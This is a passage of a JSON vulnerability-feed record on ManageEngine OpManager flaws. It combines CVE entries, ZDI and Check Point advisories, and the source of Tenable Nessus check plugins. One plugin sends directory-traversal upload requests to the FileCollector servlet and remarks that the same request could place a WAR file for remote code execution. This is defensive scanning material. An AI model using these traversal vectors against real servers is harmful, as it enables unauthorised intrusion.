(dot dot) in the (1) fileName parameter to the MigrateLEEData servlet or (2) zipFileName parameter in a downloadFileFromProbe operation to the MigrateCentralData servlet.", "cvss3": {}, "published": "2014-12-10T18:59:00", "type": "cve", "title": "CVE-2014-7866", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.0", "cpe:/a:zohocorp:manageengine_opmanager:10.0", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-7866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7866", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:zohocorp:manageengine_opmanager:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:8.8:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:51:28", "description": "Multiple SQL injection vulnerabilities in ZOHO ManageEngine OpManager 11.3 and 11.4, IT360 10.3 and 10.4, and Social IT Plus 11.0 allow remote attackers or remote authenticated users to execute arbitrary SQL commands via the (1) OPM_BVNAME parameter in a Delete operation to the APMBVHandler servlet or (2) query parameter in a compare operation to the DataComparisonServlet servlet.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-7868", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2019-07-15T17:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.3", 
"cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_it360:10.3.0"], "id": "CVE-2014-7868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7868", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_it360:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_social_it_plus:11.0:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet FILENAME parameter\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-11-30T00:00:00", "id": "E-407", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager MigrateCentralData servlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", 
"title": "ManageEngine OpManager MigrateCentralData Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2014-11-30T00:00:00", "id": "E-404", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in ManageEngine OpManager MigrateLEEData servlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "ManageEngine OpManager MigrateLEEData Servlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2014-11-30T00:00:00", "id": "E-406", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T21:14:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on 
vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the AgentDataHandler class. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-142", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-142/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MigrateCentralData servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. 
An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager MigrateCentralData zipFileName File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-144", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-144/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:31", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the MigrateLEEData servlet. The issue lies in the failure to sanitize the filenames uploaded to the servlet. 
An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager MigrateLEEData fileName File Upload Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-145", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-145/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:35", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the APMIntegBusinessViewHandler servlet. The issue lies in the failure to sanitize user-supplied input prior to executing a SQL statement. 
An attacker could leverage this vulnerability to execute code under the context of the database, which defaults to SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager APMIntegBusinessViewHandler allDevicesRemoved SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-140", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DataComparisonServlet servlet. The issue lies in the ability to execute arbitrary SQL statements. 
An attacker could leverage this vulnerability to execute code under the context of the database, which defaults to SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager DataComparisonServlet query SQL Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-141", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-141/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:36", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the APMIntegBusinessViewHandler servlet. The issue lies in the failure to sanitize user-supplied input prior to executing a SQL statement. 
An attacker could leverage this vulnerability to execute code under the context of the database, which defaults to SYSTEM.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "ManageEngine OpManager APMIntegBusinessViewHandler Delete SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-139", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-139/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:00:03", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation in HTTP requests. 
A remote unauthenticated attacker can upload arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products FileCollector Directory Traversal (CVE-2014-6035)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-10-28T00:00:00", "id": "CPAI-2014-1905", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:50:08", "description": "A directory traversal vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to lack of authentication and insufficient input validation in HTTP requests. 
A remote unauthenticated attacker can exploit this vulnerability by uploading arbitrary files to arbitrary locations.", "cvss3": {}, "published": "2015-05-11T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products Multiple Directory Traversal (CVE-2014-7866)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7866"], "modified": "2015-05-18T00:00:00", "id": "CPAI-2015-0559", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-19T00:01:09", "description": "An SQL injection vulnerability exists in ManageEngine OpManager, Social IT Plus and IT360. The vulnerability is due to insufficient input validation of the OPM_BVNAME parameter when processing requests using the APMBVHandler servlet. 
A remote attacker can exploit this vulnerability to inject and execute arbitrary SQL code on the affected system.", "cvss3": {}, "published": "2015-08-10T00:00:00", "type": "checkpoint_advisories", "title": "ManageEngine Multiple Products Multiple SQL Injections (CVE-2014-7868)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7868"], "modified": "2015-12-30T00:00:00", "id": "CPAI-2015-0963", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:46:50", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. 
If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-16T00:00:00", "type": "nessus", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/nessus/81378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. 
This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://pitstop.manageengine.com/portal/kb/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d44b4150\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6035\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item 
: dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:40:55", "description": "The remote host is running a version of Zoho ManageEngine OpManager that is affected by multiple vulnerabilities : \n\n - A blind SQL injection vulnerability exists due to improper sanitization of user-supplied input to the 'OPM_BVNAME' parameter of the APMBVHandler servlet. An unauthenticated, remote attacker can exploit this to modify the application's database and potentially gain administrative rights. (CVE-2014-7868 / CVE-2016-82014)\n\n - A reflected cross-site scripting (XSS) vulnerability exists due to improper validation of user-supplied input to the 'OPM_BVNAME' parameter of the APMBVHandler servlet. 
A context-dependent attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session.\n (CVE-2016-82015)\n\nNote that additional SQL injection vulnerabilities exist; however, Nessus has not tested for these.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-16T00:00:00", "type": "nessus", "title": "Zoho ManageEngine OpManager 'OPM_BVNAME' Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7868", "CVE-2016-82014", "CVE-2016-82015"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_OPM_BVNAME_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/81379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7868\", \"CVE-2016-82014\", \"CVE-2016-82015\");\n script_bugtraq_id(71002);\n script_xref(name:\"TRA\", value:\"TRA-2016-10\");\n script_xref(name:\"EDB-ID\", value:\"35209\");\n \n script_name(english:\"Zoho ManageEngine OpManager 'OPM_BVNAME' Multiple Vulnerabilities\");\n script_summary(english:\"Attempts to exploit the flaw.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a web application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Zoho ManageEngine OpManager\nthat is affected by multiple vulnerabilities : \n\n - A blind SQL injection vulnerability exists due to\n improper sanitization of user-supplied input to the\n 'OPM_BVNAME' parameter of the APMBVHandler servlet. 
